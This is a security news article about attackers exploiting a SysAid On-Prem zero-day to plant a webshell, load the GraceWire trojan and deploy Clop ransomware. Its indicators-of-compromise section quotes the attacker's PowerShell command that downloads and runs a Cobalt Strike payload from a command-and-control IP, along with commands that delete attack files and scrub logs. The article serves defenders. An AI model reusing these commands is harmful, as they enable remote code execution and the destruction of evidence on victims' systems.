Wednesday, January 15, 2025
HomeCVE/vulnerabilitySysAid IT Service Software 0-day Exploited to Deploy Cl0p Ransomware

SysAid IT Service Software 0-day Exploited to Deploy Cl0p Ransomware

Published on

SysAid On-Prem software has been reported with a 0-day vulnerability determined during an incident response investigation.

According to Microsoft, attackers are exploiting this zero-day vulnerability to infiltrate corporate servers, to steal sensitive data and deploy the notorious Clop ransomware.

This report highlights the urgent need for companies to prioritize their cybersecurity measures to protect their valuable assets from malicious attacks.

SysAid is a powerful and versatile software solution designed to streamline and enhance IT service management workflows across an organization.

It offers a comprehensive suite of tools and features that enable efficient and effective management of a wide range of IT services, ensuring seamless operations and improved productivity.

SysAid acted swiftly upon the vulnerability and communicated with its mitigation solution. Additionally, an upgraded version of the software has also been released, which fixes this vulnerability.

The vulnerability was associated with Path Traversal, leading to remote code execution within the SysAid on-prem software.

However, this vulnerability was exploited by a threat group known as Lace Tempest. The threat actors uploaded a WAR archive, which contains a WebShell and other payloads, into the webroot of the SysAid Tomcat web service.

SysAid IT Software 0-day Flaw

The WebShell provided the threat actor with unauthorized access and control over the compromised system, which the threat actor utilized to execute a PowerShell script that executes a malware loader under the name user.exe.

This was used to load the GraceWire trojan, which was injected into either spoolsv.exe, msiexec.exe, or svchost.exe processes.

Once the threat actor gained initial access and deployed the malware, they used a second PowerShell script to clean any trace associated with their activities from the disk and weblogs. Moreover, the threat actors also deployed the MeshAgent remote admin tool along with the trojan.

PowerShell Script Analysis

The first PowerShell script used was to Launch the Malware loader, which also lists all files placed in the C:\Program Files\SysAidServer\tomcat\webapps\usersfiles directory and removes any files used during the attack, including the usersfiles.war file and any files matching C:\Program Files\SysAidServer\tomcat\webapps\usersfiles\user.*

The second PowerShell script used was to erase evidence from Victim servers, which sleeps for 5 seconds for the exploit to complete and removes any lines in log files found within the SysAidServer\root\WEB-INF\logs and SysAidServer\tomcat\logs directories.

There was a third PowerShell script, which was used to download and execute CobaltStrike listeners on the victim host for further actions. 

A complete report that provides detailed information about the exploitation, script code, and other information has been published by SysAid.

Indicators of Compromise

Hashes

FilenameSha256Comment
user.exeb5acf14cdac40be590318dee95425d0746e85b1b7b1cbd14da66f21f2522bf4dMalicious loader
Meshagent.exe2035a69bc847dbad3b169cc74eb43fc9e6a0b6e50f0bbad068722943a71a4ccaMeshagent.exe remote admin tool

IP Addresses

IPComment
81.19.138[.]52GraceWire Loader C2
45.182.189[.]100GraceWire Loader C2
179.60.150[.]34Cobalt Strike C2
45.155.37[.]105Meshagent remote admin tool C2

File Paths

PathComment
C:\Program Files\SysAidServer\tomcat\webapps\usersfiles\user.exeGraceWire
C:\Program Files\SysAidServer\tomcat\webapps\usersfiles.warArchive of WebShells and tools used by the attacker
C:\Program Files\SysAidServer\tomcat\webapps\leaveUsed as a flag for the attacker scripts during execution

Commands

CobaltStrike

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -nop -w hidden -c IEX ((new-object net.webclient).downloadstring(‘http://179.60.150[.]34:80/a’)

Post-Compromise Cleanup

Remove-Item -Path “$tomcat_dir\webapps\usersfiles\leave”.
Remove-Item -Force “$wapps\usersfiles.war”.
Remove-Item -Force “$wapps\usersfiles\user.*”.
& “$wapps\usersfiles\user.exe”.

Antivirus Detections

Trojan:Win32/TurtleLoader
Backdoor:Win32/Clop
Ransom:Win32/Clop

Secures your storage & backup systems With StorageGuard – Watch a 40-second Video Tour.

Eswar
Eswar
Eswar is a Cyber security content editor with a passion for creating captivating and informative content. With years of experience under his belt in Cyber Security, he is covering Cyber Security News, technology and other news.

Latest articles

Aembit Announces Speaker Lineup for the Inaugural NHIcon

Aembit, the non-human identity and access management (IAM) company, unveiled the full agenda for...

Sweet Security Introduces Patent-Pending LLM-Powered Detection Engine, Reducing Cloud Detection Noise to 0.04%

Sweet Security, a leader in cloud runtime detection and response, today announced the launch...

ShadowSyndicate Hackers Added RansomHub Ransomware to their Arsenal

ShadowSyndicate is a prolific threat actor that has been active since July 2022, collaborated...

5,000 WordPress Sites Hacked in New WP3.XYZ Malware Attack

Widespread malware campaigns detected by side crawlers exploit vulnerabilities on multiple websites where the...

API Security Webinar

72 Hours to Audit-Ready API Security

APIs present a unique challenge in this landscape, as risk assessment and mitigation are often hindered by incomplete API inventories and insufficient documentation.

Join Vivek Gopalan, VP of Products at Indusface, in this insightful webinar as he unveils a practical framework for discovering, assessing, and addressing open API vulnerabilities within just 72 hours.

Discussion points

API Discovery: Techniques to identify and map your public APIs comprehensively.
Vulnerability Scanning: Best practices for API vulnerability analysis and penetration testing.
Clean Reporting: Steps to generate a clean, audit-ready vulnerability report within 72 hours.

More like this

ShadowSyndicate Hackers Added RansomHub Ransomware to their Arsenal

ShadowSyndicate is a prolific threat actor that has been active since July 2022, collaborated...

5,000 WordPress Sites Hacked in New WP3.XYZ Malware Attack

Widespread malware campaigns detected by side crawlers exploit vulnerabilities on multiple websites where the...

Hackers Exploiting Fortinet Zero-day Vulnerability In Wild To Gain Super-Admin Privileges

A critical zero-day vulnerability in Fortinet's FortiOS and FortiProxy products is being actively exploited...